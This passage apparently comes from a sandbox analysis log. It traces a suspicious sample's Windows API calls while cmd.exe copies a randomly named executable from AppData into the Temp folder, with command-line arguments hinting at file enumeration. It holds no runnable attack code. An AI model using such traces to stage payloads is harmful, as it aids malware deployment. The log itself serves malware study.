\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" [0111.777] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0111.778] GetModuleFileNameW (in: hModule=0x0, 
lpFilename=0x3b1bc0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0111.778] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0111.778] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0111.778] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0111.778] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0111.778] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0111.778] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0111.778] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0111.778] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0111.778] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0111.778] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0111.778] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0111.778] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0111.778] GetEnvironmentStringsW () returned 0x3b25b0* [0111.778] FreeEnvironmentStringsW (penv=0x3b25b0) returned 1 [0111.778] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0111.778] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0111.778] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0111.778] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0111.778] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0111.778] _wcsicmp (_String1="KEYS", 
_String2="CMDCMDLINE") returned 8 [0111.778] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0111.778] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0111.778] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0111.778] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0111.778] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf4a8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0111.779] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf4a8, lpFilePart=0x1cf4a4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf4a4*="Desktop") returned 0x18 [0111.779] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0111.779] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf224 | out: lpFindFileData=0x1cf224) returned 0x3b0c40 [0111.779] FindClose (in: hFindFile=0x3b0c40 | out: hFindFile=0x3b0c40) returned 1 [0111.779] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf224 | out: lpFindFileData=0x1cf224) returned 0x3b0c40 [0111.779] FindClose (in: hFindFile=0x3b0c40 | out: hFindFile=0x3b0c40) returned 1 [0111.779] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf224 | out: lpFindFileData=0x1cf224) returned 0x3b0c40 [0111.779] FindClose (in: hFindFile=0x3b0c40 | out: hFindFile=0x3b0c40) returned 1 [0111.779] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0111.779] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0111.779] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0111.779] GetEnvironmentStringsW () returned 0x3b0460* [0111.779] FreeEnvironmentStringsW (penv=0x3b0460) returned 1 [0111.780] GetCurrentDirectoryW (in: 
nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0111.780] GetConsoleOutputCP () returned 0x1b5 [0111.780] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0111.780] GetUserDefaultLCID () returned 0x409 [0111.780] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0111.780] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cf5e8, cchData=128 | out: lpLCData="0") returned 2 [0111.780] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cf5e8, cchData=128 | out: lpLCData="0") returned 2 [0111.780] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cf5e8, cchData=128 | out: lpLCData="1") returned 2 [0111.780] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0111.781] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0111.781] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0111.781] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0111.781] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0111.781] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0111.781] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0111.781] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0111.781] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0111.781] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: 
lpLCData=",") returned 2 [0111.781] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0111.782] GetConsoleTitleW (in: lpConsoleTitle=0x3a0aa0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0111.782] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0111.782] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0111.782] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0111.782] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0111.782] _wcsicmp (_String1="type", _String2=")") returned 75 [0111.783] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0111.783] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0111.783] _wcsicmp (_String1="IF", _String2="type") returned -11 [0111.783] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0111.783] _wcsicmp (_String1="REM", _String2="type") returned -2 [0111.783] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0111.786] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\"") returned 68 [0111.786] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\"") returned 68 [0111.786] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\"") returned 71 [0111.786] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\"") returned 71 [0111.786] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\"") returned 80 [0111.786] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\"") returned 80 [0111.789] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.789] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.789] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.789] 
GetFileType (hFile=0x7) returned 0x2 [0111.789] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0111.789] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf47c | out: lpMode=0x1cf47c) returned 1 [0111.789] _dup (_FileHandle=1) returned 3 [0111.789] _close (_FileHandle=1) returned 0 [0111.789] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe", _String2="con") returned -53 [0111.789] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\gym4nxcu.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x1cf44c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0111.790] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0111.790] GetConsoleTitleW (in: lpConsoleTitle=0x1cf27c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0111.790] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0111.790] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0111.790] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0111.790] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0111.791] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0111.791] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x1cede0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cede0) returned 0x3b21d0 [0111.791] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0111.791] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0111.791] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0111.791] CreateFileW 
(lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1cdcec, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0111.792] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0111.792] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.792] GetFileType (hFile=0x54) returned 0x1 [0111.792] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.792] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x1cdd44 | out: lpFileSizeHigh=0x1cdd44*=0x0) returned 0x7d600 [0111.792] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.792] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.792] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.792] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.792] GetFileType (hFile=0x4c) returned 0x1 [0111.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.792] GetFileType (hFile=0x4c) returned 0x1 [0111.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.792] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.793] GetFileType (hFile=0x4c) returned 0x1 [0111.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.793] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, 
lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.793] GetFileType (hFile=0x4c) returned 0x1 [0111.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.793] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.793] GetFileType (hFile=0x4c) returned 0x1 [0111.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.793] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.793] GetFileType (hFile=0x4c) returned 0x1 [0111.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.793] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.794] GetFileType (hFile=0x4c) returned 0x1 [0111.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.794] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.794] GetFileType (hFile=0x4c) returned 0x1 [0111.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.794] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, 
lpOverlapped=0x0) returned 1 [0111.794] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.794] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.794] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.794] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.794] GetFileType (hFile=0x4c) returned 0x1 [0111.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.794] GetFileType (hFile=0x4c) returned 0x1 [0111.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.794] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.794] GetFileType (hFile=0x4c) returned 0x1 [0111.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.794] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.794] GetFileType (hFile=0x4c) returned 0x1 [0111.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.794] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.794] GetFileType (hFile=0x4c) returned 0x1 [0111.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.795] WriteFile (in: hFile=0x4c, 
lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.795] GetFileType (hFile=0x4c) returned 0x1 [0111.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.795] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.795] GetFileType (hFile=0x4c) returned 0x1 [0111.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.795] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.795] GetFileType (hFile=0x4c) returned 0x1 [0111.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.795] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.795] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.795] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.795] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.795] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.795] GetFileType (hFile=0x4c) returned 0x1 [0111.795] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0111.795] GetFileType (hFile=0x4c) returned 0x1 [0111.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.795] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.795] GetFileType (hFile=0x4c) returned 0x1 [0111.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.795] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.795] GetFileType (hFile=0x4c) returned 0x1 [0111.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.795] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.795] GetFileType (hFile=0x4c) returned 0x1 [0111.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.795] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.796] GetFileType (hFile=0x4c) returned 0x1 [0111.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.796] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.796] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0111.796] GetFileType (hFile=0x4c) returned 0x1 [0111.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.796] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.796] GetFileType (hFile=0x4c) returned 0x1 [0111.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.796] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.796] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.796] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.796] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.796] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.796] GetFileType (hFile=0x4c) returned 0x1 [0111.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.796] GetFileType (hFile=0x4c) returned 0x1 [0111.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.796] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.796] GetFileType (hFile=0x4c) returned 0x1 [0111.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.796] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, 
lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.796] GetFileType (hFile=0x4c) returned 0x1 [0111.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.796] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.796] GetFileType (hFile=0x4c) returned 0x1 [0111.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.796] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.797] GetFileType (hFile=0x4c) returned 0x1 [0111.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.797] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.797] GetFileType (hFile=0x4c) returned 0x1 [0111.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.797] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.797] GetFileType (hFile=0x4c) returned 0x1 [0111.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.797] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: 
